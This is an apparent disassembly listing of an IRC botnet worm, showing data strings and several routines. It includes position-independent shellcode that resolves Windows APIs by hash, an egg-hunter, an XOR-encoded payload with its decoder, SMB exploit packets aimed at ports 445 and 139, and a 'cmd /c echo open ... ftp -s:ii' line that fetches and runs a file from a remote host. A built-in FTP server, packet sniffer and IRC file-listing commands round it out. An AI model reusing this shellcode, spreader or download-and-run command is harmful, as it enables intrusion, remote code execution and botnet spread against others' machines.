dd 64692D3Ah, 5 dup(0)
dd 64692B3Ah, 5 dup(0)
dd 64692F3Ah, 5 dup(0)
dd 64695C3Ah, 5 dup(0)
dd 64693D3Ah, 5 dup(0)
dd 64693F3Ah, 5 dup(0)
dd 6469273Ah, 5 dup(0)
dd 6469603Ah, 5 dup(0)
dd 64697E3Ah, 5 dup(0)
dd 6469203Ah, 5 dup(0)
dd 61682E3Ah, 6E696873h, 4 dup(0)
dd 6168213Ah, 6E696873h, 4 dup(0)
dd 6168243Ah, 6E696873h, 4 dup(0)
dd 6168253Ah, 6E696873h, 4 dup(0)
dd 65732E3Ah, 65727563h, 4 dup(0)
dd 6573213Ah, 65727563h, 4 dup(0)
dd 6C2E3Ah, 5 dup(0)
dd 6C213Ah, 5 dup(0)
dd 6C243Ah, 5 dup(0)
dd 6C253Ah, 5 dup(0)
dd 782E3Ah, 5 dup(0)
dd 78213Ah, 5 dup(0)
dd 78243Ah, 5 dup(0)
dd 78253Ah, 5 dup(0)
dd 79732E3Ah, 6Eh, 4 dup(0)
dd 7973213Ah, 6Eh, 4 dup(0)
dd 7973243Ah, 6Eh, 4 dup(0)
dd 7973253Ah, 6Eh, 4 dup(0)
dd 4B444320h, 207965h, 4 dup(0)
dd 4E494F4Ah, 2320h, 3 dup(0)
dd 1, 4B43494Eh, 20h, 3 dup(0)
dd 1, 5245504Fh, 20h, 3 dup(0)
dd 1, 7265706Fh, 20h, 3 dup(0)
dd 1, 20776F6Eh, 49206E61h, 4F204352h, 61726570h, 726F74h
dd 1, 52455355h, 20h, 3 dup(0)
dd 2, 53534150h, 20h, 3 dup(0)
dd 2, 70796170h, 6C61h, 3 dup(0)
dd 3, 50594150h, 4C41h, 3 dup(0)
dd 3, 70796170h, 632E6C61h, 6D6Fh, 2 dup(0)
dd 3, 50594150h, 432E4C41h, 4D4Fh, 2 dup(0)
dd 3, 2D746553h, 6B6F6F43h, 3A6569h, 2 dup(0)
dd 3, 6 dup(0)
aHttp db 'HTTP',0 ; DATA XREF: _2:00424C64�o
align 4
aFtp db 'FTP',0 ; DATA XREF: _2:00424C60�o
off_4254CC dd offset byte_435249 ; DATA XREF: _2:00424C5C�o
dword_4254D0 dd 544F42h ; DATA XREF: _2:off_424C58�o
unk_4254D4 db 2 ; DATA XREF: sub_402688+2FC�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Eh, 69h
db 66h ; f
db 66h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aErrorRecvFaile db 'Error: recv() failed, returned: <%d>',0
align 4
unk_425518 db 2 ; DATA XREF: sub_402688+2AB�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Eh, 69h
db 66h ; f
db 66h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aSuspiciousSPac db 'Suspicious %s packet from: %s:%d - %s.',0
align 4
aPsniff db '[PSNIFF]',0 ; DATA XREF: sub_402688+235�o
align 4
unk_425568 db 2 ; DATA XREF: sub_402688+186�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Eh, 69h
db 66h ; f
db 66h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aErrorWsaioctlF db 'Error: WSAIoctl() failed, returned: <%d>.',0
align 10h
unk_4255B0 db 2 ; DATA XREF: sub_402688+103�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Eh, 69h
db 66h ; f
db 66h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aErrorBindFaile db 'Error: bind() failed, returned: <%d>.',0
align 4
unk_4255F4 db 2 ; DATA XREF: sub_402688+85�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Eh, 69h
db 66h ; f
db 66h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aErrorSocketFai db 'Error: socket() failed, returned: <%d>.',0
aRbrbrbrb db 'BBBB',0 ; DATA XREF: sub_402C5D+B2�o
align 4
dword_425644 dd 10FF8h, 0 ; DATA XREF: sub_402C5D+6A�o
dword_42564C dd 10FF8h ; DATA XREF: sub_402C5D+79�o
dword_425650 dd 7FFDF020h, 0 ; DATA XREF: sub_402C5D+162�o
dword_425658 dd 424D53FFh, 72h, 0C8531800h, 3 dup(0) ; DATA XREF: sub_403087+7B�o
dd 13370000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_4256E0 dd 424D53FFh, 73h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_403087+34�o
dd 13370000h, 0
dd 0FF0Ch, 0A110400h, 2 dup(0)
dword_425710 dd 0 ; DATA XREF: sub_403087+44�o
dd 800000D4h, 0
unk_42571C db 81h ; ; DATA XREF: sub_403161+A�o
db 2 dup(0), 44h
aCkfdenecfdeffc db ' CKFDENECFDEFFCFGEFFCCACACACACACA',0
aCacacacacacaca db ' CACACACACACACACACACACACACACACAAA',0
align 8
byte_425768 db 41h ; DATA XREF: sub_4031FF+107�r
aBcdefghijklmno db 'BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/',0
align 4
; =============== S U B R O U T I N E =======================================
sub_4257AC proc near ; DATA XREF: sub_40345C+80�o
push ebx
push esi
push edi
sub sp, 80h
mov esi, esp
call sub_4258A8
push dword ptr [esi]
push 63D61209h
call sub_4258BE
mov [esi+8], eax
call sub_425871
push dword ptr [esi+4]
push 0CA2BD06Bh
call sub_4258BE
mov [esi+0Ch], eax
call sub_425823
push dword ptr [esi+4]
push 4C0297FAh
call sub_4258BE
xor ebx, ebx
push 410h
push ebx
call eax
mov ebx, eax
push esi
mov esi, [esi+10h]
mov edi, eax
mov ecx, 410h
rep movsb
pop esi
xor eax, eax
push eax
push eax
push eax
push ebx
push eax
push eax
call dword ptr [esi+0Ch]
mov eax, [esi+8]
add sp, 80h
pop edi
pop esi
pop ebx
jmp eax
sub_4257AC endp
; =============== S U B R O U T I N E =======================================
sub_425823 proc near ; CODE XREF: sub_4257AC+33�p
var_20 = dword ptr -20h
var_14 = dword ptr -14h
pusha
call sub_42584C
mov eax, [esp+20h+var_14]
lea ebx, [eax+7Ch]
add dword ptr [ebx+3Ch], 5
add dword ptr [ebx+28h], 1000h
and dword ptr [ebx+28h], 0FFFFF000h
mov eax, [esp+20h+var_20]
add esp, 14h
push eax
xor eax, eax
retn
sub_425823 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42584C proc near ; CODE XREF: sub_425823+1�p
xor edx, edx
push dword ptr fs:[edx]
mov fs:[edx], esp
xor ebx, ebx
mov eax, 42904290h
loc_42585B: ; CODE XREF: sub_42584C+1A�j
xor ecx, ecx
mov cl, 2
mov edi, ebx
repe scasd
jz short loc_425868
inc ebx
jmp short loc_42585B
; ---------------------------------------------------------------------------
loc_425868: ; CODE XREF: sub_42584C+17�j
mov [esi+10h], edi
pop dword ptr fs:[edx]
pop eax
popa
retn
sub_42584C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_425871 proc near ; CODE XREF: sub_4257AC+1E�p
pusha
mov edi, 7FFDF020h
mov ebx, [edi]
mov eax, [esi+8]
mov [edi], eax
mov edi, [edi-8]
add edi, 178h
mov ecx, edi
loc_425889: ; CODE XREF: sub_425871+1E�j
cmp [ecx], ebx
jz short loc_425891
mov ecx, [ecx]
jmp short loc_425889
; ---------------------------------------------------------------------------
loc_425891: ; CODE XREF: sub_425871+1A�j
mov edx, edi
loc_425893: ; CODE XREF: sub_425871+2A�j
cmp [edx+4], ebx
jz short loc_42589D
mov edx, [edx+4]
jmp short loc_425893
; ---------------------------------------------------------------------------
loc_42589D: ; CODE XREF: sub_425871+25�j
mov [ecx], edx
mov [edx+4], ecx
mov byte ptr [ebx-3], 1
popa
retn
sub_425871 endp
; =============== S U B R O U T I N E =======================================
sub_4258A8 proc near ; CODE XREF: sub_4257AC+A�p
mov eax, ds:7FFDF00Ch
mov eax, [eax+1Ch]
mov ebx, [eax+8]
mov [esi], ebx
mov eax, [eax]
mov eax, [eax+8]
mov [esi+4], eax
retn
sub_4258A8 endp
; =============== S U B R O U T I N E =======================================
sub_4258BE proc near ; CODE XREF: sub_4257AC+16�p
; sub_4257AC+2B�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
pusha
mov ebp, [esp+20h+arg_4]
mov eax, [ebp+3Ch]
mov edx, [ebp+eax+78h]
add edx, ebp
mov ecx, [edx+18h]
mov ebx, [edx+20h]
add ebx, ebp
loc_4258D4: ; CODE XREF: sub_4258BE+33�j
jecxz short loc_42590E
dec ecx
mov esi, [ebx+ecx*4]
add esi, ebp
xor edi, edi
xor eax, eax
cld
loc_4258E1: ; CODE XREF: sub_4258BE+2D�j
lodsb
cmp al, ah
jz short loc_4258ED
ror edi, 0Dh
add edi, eax
jmp short loc_4258E1
; ---------------------------------------------------------------------------
loc_4258ED: ; CODE XREF: sub_4258BE+26�j
cmp edi, [esp+20h+arg_0]
jnz short loc_4258D4
mov ebx, [edx+24h]
add ebx, ebp
mov cx, [ebx+ecx*2]
mov ebx, [edx+1Ch]
add ebx, ebp
mov eax, [ebx+ecx*4]
add eax, ebp
mov [esp+20h+var_4], eax
popa
retn 8
; ---------------------------------------------------------------------------
loc_42590E: ; CODE XREF: sub_4258BE:loc_4258D4�j
; sub_4258BE:loc_42590E�j
jmp short loc_42590E
sub_4258BE endp
; ---------------------------------------------------------------------------
dd 0
; =============== S U B R O U T I N E =======================================
sub_425914 proc near ; DATA XREF: sub_40345C+30�o
arg_0 = dword ptr 4
add esp, 0FFFFF254h
cld
call sub_425966
mov eax, [ebp+3Ch]
mov edi, [ebp+eax+78h]
add edi, ebp
mov ecx, [edi+18h]
mov ebx, [edi+20h]
add ebx, ebp
loc_425931: ; CODE XREF: sub_425914+38�j
jecxz short loc_425961
dec ecx
mov esi, [ebx+ecx*4]
add esi, ebp
xor eax, eax
cdq
loc_42593C: ; CODE XREF: sub_425914+32�j
lodsb
test al, al
jz short loc_425948
ror edx, 0Dh
add edx, eax
jmp short loc_42593C
; ---------------------------------------------------------------------------
loc_425948: ; CODE XREF: sub_425914+2B�j
cmp edx, [esp+arg_0]
jnz short loc_425931
mov ebx, [edi+24h]
add ebx, ebp
mov cx, [ebx+ecx*2]
mov ebx, [edi+1Ch]
add ebx, ebp
mov ebx, [ebx+ecx*4]
add ebx, ebp
loc_425961: ; CODE XREF: sub_425914:loc_425931�j
mov [esp+arg_0], ebx
retn
sub_425914 endp
; =============== S U B R O U T I N E =======================================
sub_425966 proc near ; CODE XREF: sub_425914+7�p
; FUNCTION CHUNK AT 0042599E SIZE 00000007 BYTES
xor eax, eax
mov eax, fs:[eax+30h]
test eax, eax
js short loc_42597F
mov eax, [eax+0Ch]
mov esi, [eax+1Ch]
lodsd
mov ebp, [eax+8]
jmp loc_42598A
; ---------------------------------------------------------------------------
loc_42597F: ; CODE XREF: sub_425966+8�j
mov eax, [eax+34h]
add eax, 7Ch
mov ebp, [eax+3Ch]
loc_42598A: ; CODE XREF: sub_425966+14�j
pop edi
xor esi, esi
pusha
push esi
jmp short loc_42599E
sub_425966 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_425991 proc near ; CODE XREF: sub_425966:loc_42599E�p
push 60E0CEEFh
push 0E8AFE98h
push edi
jmp edi
sub_425991 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425966
loc_42599E: ; CODE XREF: sub_425966+29�j
call sub_425991
loc_4259A3: ; DATA XREF: sub_402C02+1B�o
; sub_40D2E0+822�o
add [ebx], ah
; END OF FUNCTION CHUNK FOR sub_425966
; ---------------------------------------------------------------------------
db 3 dup(0)
dword_4259A8 dd 60h ; DATA XREF: sub_402C5D+320�o
dword_4259AC dd 62B0606h, 2050501h, 0A0h ; DATA XREF: sub_402C5D+2F5�o
dword_4259B8 dd 30h ; DATA XREF: sub_402C5D+2CA�o
dword_4259BC dd 0A1h ; DATA XREF: sub_402C5D+29F�o
dword_4259C0 dd 3 ; DATA XREF: sub_402C5D+246�o
aCccc db 'CCCC',0 ; DATA XREF: sub_402C5D+153�o
align 4
loc_4259CC: ; DATA XREF: sub_402C5D+E8�o
jmp short near ptr dword_4259D4
; ---------------------------------------------------------------------------
db 6 dup(90h)
dword_4259D4 dd 0 ; CODE XREF: _2:loc_4259CC�j
aCmdCEchoOpenSD db 'cmd /c echo open %s %d >> ii &echo user 1 1 >> ii &echo get %s >>'
; DATA XREF: sub_40345C+55�o
db ' ii &echo bye >> ii &ftp -n -v -s:ii &del ii &%s',0Dh,0Ah,0
a221GoodbyeHapp db '221 Goodbye happy r00ting.',0Ah,0 ; DATA XREF: sub_403A1B+5D0�o
aQuit db 'QUIT',0 ; DATA XREF: sub_403A1B+5BC�o
; sub_40D2E0+537�o
align 10h
a425CanTOpenDat db '425 Can',27h,'t open data connection.',0Ah,0
; DATA XREF: sub_403A1B+5AF�o
align 4
unk_425A94 db 3 ; DATA XREF: sub_403A1B+564�o
db 31h, 32h, 6Eh
db 2
db 7Ah, 1Fh, 6Dh
db 1Fh
db 20h, 28h, 66h
db 74h ; t
db 70h, 64h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 3
a8SPortDNowExec db '8 %s, port:%d now executing %s on remote ABOSAL7.',0
align 4
a226TransferC_0 db '226 Transfer complete.',0Ah,0 ; DATA XREF: sub_403A1B+545�o
a150OpeningBina db '150 Opening BINARY mode data connection',0Ah,0
; DATA XREF: sub_403A1B+519�o
align 4
aRetr db 'RETR',0 ; DATA XREF: sub_403A1B+501�o
align 10h
a200PortCommand db '200 PORT command successful.',0Ah,0 ; DATA XREF: sub_403A1B+4EC�o
align 10h
aS_S_S_S db '%s.%s.%s.%s',0 ; DATA XREF: sub_403A1B+4DB�o
aXX db '%x%x',0Ah,0 ; DATA XREF: sub_403A1B+4A8�o
align 4
aS db '%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^',0Ah ; DATA XREF: sub_403A1B+464�o
db ']',0
aPort db 'PORT',0 ; DATA XREF: sub_403A1B+42B�o
align 4
a226TransferCom db '226 Transfer complete',0Ah,0 ; DATA XREF: sub_403A1B+3FD�o
align 4
aList db 'LIST',0 ; DATA XREF: sub_403A1B+3EA�o
align 4
a425PassiveNotS db '425 Passive not supported on this server',0Ah,0
; DATA XREF: sub_403A1B+3AF�o
align 10h
aPasv db 'PASV',0 ; DATA XREF: sub_403A1B+39C�o
align 4
a200TypeSetToI_ db '200 Type set to I.',0Ah,0 ; DATA XREF: sub_403A1B+38C�o
aI: ; DATA XREF: sub_403A1B+378�o
unicode 0, <I>,0
a200TypeSetToA_ db '200 Type set to A.',0Ah,0 ; DATA XREF: sub_403A1B+351�o
aA: ; DATA XREF: sub_403A1B+33D�o
unicode 0, <A>,0
aType db 'TYPE',0 ; DATA XREF: sub_403A1B+326�o
; sub_403A1B+361�o
align 10h
a257IsCurrentDi db '257 "/" is current directory.',0Ah,0 ; DATA XREF: sub_403A1B+316�o
align 10h
off_425C40 dd offset dword_445750 ; DATA XREF: sub_403A1B+302�o
a350Restarting_ db '350 Restarting.',0Ah,0 ; DATA XREF: sub_403A1B+2F2�o
align 4
aRest db 'REST',0 ; DATA XREF: sub_403A1B+2DE�o
align 10h
a215Nzmxftpd db '215 NzmxFtpd',0Ah,0 ; DATA XREF: sub_403A1B+2CE�o
align 10h
aSyst db 'SYST',0 ; DATA XREF: sub_403A1B+2BA�o
align 4
a230UserLoggedI db '230 User logged in.',0Ah,0 ; DATA XREF: sub_403A1B+2AA�o
align 10h
aPass db 'PASS',0 ; DATA XREF: sub_403A1B+296�o
align 4
a331PasswordReq db '331 Password required',0Ah,0 ; DATA XREF: sub_403A1B+286�o
align 10h
aUser_0 db 'USER',0 ; DATA XREF: sub_403A1B+271�o
align 4
aSS db '%s %s',0 ; DATA XREF: sub_403A1B+260�o
align 10h
a220Nzmxftpd0wn db '220 NzmxFtpd 0wns j0',0Ah,0 ; DATA XREF: sub_403A1B+1D8�o
align 4
aRb db 'rb',0 ; DATA XREF: sub_40409E+24�o
; sub_40525F+12E�o ...
align 4
unk_425CDC db 2 ; DATA XREF: sub_404138+3F8�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 68h, 2 dup(74h)
db 70h ; p
db 64h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aErrorServerFai db 'Error: server failed, returned: <%d>.',0
align 10h
asc_425D20 db 0Dh,0Ah,0 ; DATA XREF: sub_404138+2CF�o
align 4
asc_425D24: ; DATA XREF: sub_404138+293�o
; sub_40D2E0+A8�o ...
unicode 0, < >,0
aGet db 'GET ',0 ; DATA XREF: sub_404138+269�o
align 10h
aHttp1_0200Ok_0 db 'HTTP/1.0 200 OK',0Dh,0Ah ; DATA XREF: sub_404593+F7�o
db 'Server: myBot',0Dh,0Ah
db 'Cache-Control: no-cache,no-store,max-age=0',0Dh,0Ah
db 'pragma: no-cache',0Dh,0Ah
db 'Content-Type: %s',0Dh,0Ah
db 'Content-Length: %i',0Dh,0Ah
db 'Accept-Ranges: bytes',0Dh,0Ah
db 'Date: %s %s GMT',0Dh,0Ah
db 'Last-Modified: %s %s GMT',0Dh,0Ah
db 'Expires: %s %s GMT',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 10h
aHttp1_0200OkSe db 'HTTP/1.0 200 OK',0Dh,0Ah ; DATA XREF: sub_404593+D4�o
db 'Server: myBot',0Dh,0Ah
db 'Cache-Control: no-cache,no-store,max-age=0',0Dh,0Ah
db 'pragma: no-cache',0Dh,0Ah
db 'Content-Type: %s',0Dh,0Ah
db 'Accept-Ranges: bytes',0Dh,0Ah
db 'Date: %s %s GMT',0Dh,0Ah
db 'Last-Modified: %s %s GMT',0Dh,0Ah
db 'Expires: %s %s GMT',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aHhMmSs db 'HH:mm:ss',0 ; DATA XREF: sub_404593+98�o
; sub_409F1E+1AE�o
align 4
aDddDdMmmYyyy db 'ddd, dd MMM yyyy',0 ; DATA XREF: sub_404593+84�o
align 4
aApplicationOct db 'application/octet-stream',0 ; DATA XREF: sub_404593:loc_4045F9�o
align 4
aTextHtml db 'text/html',0 ; DATA XREF: sub_404593+5F�o
align 4
unk_425F44 db 2 ; DATA XREF: sub_404716+296�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 68h, 2 dup(74h)
db 70h ; p
db 64h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aFailedToStartW db 'Failed to start worker thread, error: <%d>.',0
unk_425F8C db 2 ; DATA XREF: sub_404716+212�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 68h, 2 dup(74h)
db 70h ; p
db 64h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aWorkerThreadOf db 'Worker thread of server thread: %d.',0
asc_425FCC: ; DATA XREF: sub_404716+15A�o
unicode 0, <*>,0
asc_425FD0: ; DATA XREF: sub_404716+FB�o
; sub_4049CD+29�o ...
dw 0Ah
unicode 0, <>,0
aSS_2 db '%s%s',0 ; DATA XREF: sub_404716+EA�o
; sub_4049CD+4DA�o ...
align 4
aS_2 db '%s',0 ; DATA XREF: sub_404716+3A�o
; sub_4099D6+4C�o ...
align 10h
aS_3 db '\%s',0 ; DATA XREF: sub_404716+2F�o
aFoundIFilesAnd db 'Found: %i Files and %i Directories',0Dh,0Ah,0
; DATA XREF: sub_4049CD+652�o
align 4
aTrTdColspan3_0 db '<TR>',0Dh,0Ah ; DATA XREF: sub_4049CD+637�o
db '<TD COLSPAN="3"><HR></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah
db '</TABLE>',0Dh,0Ah
db '</BODY>',0Dh,0Ah
db '</HTML>',0Dh,0Ah,0
align 4
aPrivmsgSFoundS db 'PRIVMSG %s :Found %s Files and %s Directories',0Ah,0
; DATA XREF: sub_4049CD+61C�o
align 4
a31s21sIBytes db '%-31s %-21s (%i bytes)',0Dh,0Ah,0 ; DATA XREF: sub_4049CD+58D�o
align 10h
aTdTdWidthDCo_0 db '</TD>',0Dh,0Ah ; DATA XREF: sub_4049CD+571�o
db '<TD WIDTH="%d"><CODE>%s</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>%dk</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
aCodeSCodeA_0 db '"><CODE>%s</CODE></A>',0 ; DATA XREF: sub_4049CD:loc_404EF5�o
align 10h
aCode_30sGtCode db '"><CODE>%.30s></CODE></A>',0 ; DATA XREF: sub_4049CD+521�o
align 10h
aPrivmsgS31s2_0 db 'PRIVMSG %s :%-31s %-21s (%s bytes)',0Ah,0 ; DATA XREF: sub_4049CD+46E�o
align 4
a31s21s db '%-31s %-21s',0Dh,0Ah,0 ; DATA XREF: sub_4049CD+42F�o
align 4
aTdTdWidthDCode db '</TD>',0Dh,0Ah ; DATA XREF: sub_4049CD+3F9�o
db '<TD WIDTH="%d"><CODE>%s</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>-</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 10h
aCodeSCodeA db '"><CODE>%s/</CODE></A>',0 ; DATA XREF: sub_4049CD:loc_404D87�o
align 4
aCode_29sGtCode db '"><CODE>%.29s>/</CODE></A>',0 ; DATA XREF: sub_4049CD+3B3�o
align 4
aSS_0 db '%s%s/',0 ; DATA XREF: sub_4049CD+36C�o
align 10h
aTrTdWidthDAHre db '<TR>',0Dh,0Ah ; DATA XREF: sub_4049CD+328�o
; sub_4049CD+496�o
db '<TD WIDTH="%d"><A HREF="',0
align 10h
aPrivmsgS31s21s db 'PRIVMSG %s :%-31s %-21s',0Ah,0 ; DATA XREF: sub_4049CD+310�o
align 4
aS_0 db '<%s>',0 ; DATA XREF: sub_4049CD+2E9�o
; sub_4049CD+40B�o
align 4
a2_2d2_2d4d2_2d db '%2.2d/%2.2d/%4d %2.2d:%2.2d %s',0 ; DATA XREF: sub_4049CD+2BF�o
aAm db 'AM',0 ; DATA XREF: sub_4049CD+295�o
align 4
aPm db 'PM',0 ; DATA XREF: sub_4049CD+28A�o
align 4
a__1: ; DATA XREF: sub_4049CD+252�o
unicode 0, <.>,0
a__ db '..',0 ; DATA XREF: sub_4049CD+237�o
align 4
aTrTdColspan3AH db '<TR>',0Dh,0Ah ; DATA XREF: sub_4049CD+1C5�o
db '<TD COLSPAN="3"><A HREF="%s"><CODE>Parent Directory</CODE></A></T'
db 'D>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
aSearchingForS db 'Searching for: %s',0Dh,0Ah,0 ; DATA XREF: sub_4049CD+149�o
aTrTdColspan3Hr db '<TR>',0Dh,0Ah ; DATA XREF: sub_4049CD+12D�o
db '<TD COLSPAN="3"><HR></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
aTrTdWidthDCode db '<TR>',0Dh,0Ah ; DATA XREF: sub_4049CD+F9�o
db '<TD WIDTH="%d"><CODE>Name</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d"><CODE>Last Modified</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>Size</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
aH1IndexOfSH1Ta db '<H1>Index of %s</H1>',0Dh,0Ah ; DATA XREF: sub_4049CD+AE�o
db '<TABLE BORDER="0">',0Dh,0Ah,0
align 10h
aHtmlHeadTitleI db '<HTML>',0Dh,0Ah ; DATA XREF: sub_4049CD+79�o
db '<HEAD>',0Dh,0Ah
db '<TITLE>Index of %s</TITLE>',0Dh,0Ah
db '</HEAD>',0Dh,0Ah
db '<BODY>',0Dh,0Ah,0
align 10h
aPrivmsgSSearch db 'PRIVMSG %s :Searching for: %s',0Dh,0Ah,0 ; DATA XREF: sub_4049CD+4B�o
aSSHttp1_1Refer db '%s %s HTTP/1.1',0Ah ; DATA XREF: sub_40513E+8F�o
db 'Referer: %s',0Ah
db 'Host: %s',0Ah
db 'Connection: close',0Ah
db 0Ah,0
dword_426488 dd 4000500h, 7868746Bh, 0 ; DATA XREF: sub_40525F+493�o
dword_426494 dd 7A026E02h, 201F6D1Fh, 74667428h, 1F702E70h, 29671F6Ch
; DATA XREF: sub_40525F+47F�o
dd 0BBBB0220h, 74202002h, 736E6172h, 20726566h, 20206F74h
dd 20207325h, 75731F02h, 73656363h, 6C756673h, 6320796Ch
dd 6C706D6Fh, 64657465h, 202C021Fh, 6F666E69h, 2528203Ah
dd 2E2973h
unk_4264E8 db 2 ; DATA XREF: sub_40525F+3B6�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 74h, 66h, 74h
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFileNotFoundSS db ' File not found: %s (%s).',0
dword_42651C dd 1000500h, 656C6946h, 746F4E20h, 756F4620h, 646Eh
; DATA XREF: sub_40525F+399�o
dword_426530 dd 7A026E02h, 201F6D1Fh, 74667428h, 1F702E70h, 29671F6Ch
; DATA XREF: sub_40525F+33E�o
dd 0BBBB0220h, 74202002h, 736E6172h, 20726566h, 20206F74h
dd 20207325h, 65621F02h, 6E6E6967h, 1F676E69h, 69202C02h
dd 3A6F666Eh, 73252820h, 2E29h
unk_426578 db 2 ; DATA XREF: sub_40525F+15A�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 74h, 66h, 74h
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToOpenFi db ' Failed to open file: %s.',0
unk_4265AC db 2 ; DATA XREF: sub_40525F+6A�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 74h, 66h, 74h
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aErrorSocketF_0 db ' Error: socket() failed, returned: <%d>.',0
align 10h
aOctet db 'octet',0 ; DATA XREF: sub_40525F+F�o
align 4
aAsn445 db 'asn445',0 ; DATA XREF: sub_405DAD+169�o
align 10h
dd 73610000h, 6D73316Eh, 62h, 5 dup(0)
dword_426620 dd 1BDh ; DATA XREF: sub_405756+1E�r
; sub_40D2E0+30B3�r ...
off_426624 dd offset sub_40345C ; DATA XREF: sub_405DAD+1EA�r
dword_426628 dd 0 ; DATA XREF: sub_40345C+1BA�w
; sub_40345C+1C0�r ...
dword_42662C dd 1 ; DATA XREF: sub_405898+1F�r
dword_426630 dd 1 ; DATA XREF: sub_405898:loc_405B09�r
aAsn139 db 'asn139',0
align 4
dd 73610000h, 6D73316Eh, 746E62h, 5 dup(0)
dd 8Bh, 40345Ch, 0 ; CODE XREF: sub_4266AE:loc_4266C3�j
dd 2 dup(1), 0Fh dup(0)
; ---------------------------------------------------------------------------
jmp short loc_4266BE
; =============== S U B R O U T I N E =======================================
sub_4266AE proc near ; CODE XREF: sub_4266AE:loc_4266BE�p
pop edx
dec edx
xor ecx, ecx
mov cx, 166h
loc_4266B6: ; CODE XREF: sub_4266AE+C�j
xor byte ptr [edx+ecx], 99h
loop loc_4266B6
jmp short loc_4266C3
; ---------------------------------------------------------------------------
loc_4266BE: ; CODE XREF: _2:004266AC�j
call sub_4266AE
loc_4266C3: ; CODE XREF: sub_4266AE+E�j
jo short near ptr dword_42665C+2
cwde
cdq
cdq
retn
sub_4266AE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 21h, 95h, 69h
dd 9912E664h, 3485E912h, 1291D912h, 0A5EA1241h, 0EF126A9Ah
dd 126A9AE1h, 629AB9E7h, 0AA8DD712h, 0C8CECF74h, 629AA612h
dd 97F36B12h, 0ED3F6AC0h, 1AC6C091h, 7BDC9D5Eh, 0C7C6C070h
dd 0DF125412h, 485A9ABDh, 0AA589A78h, 9112FF50h, 9A85DF12h
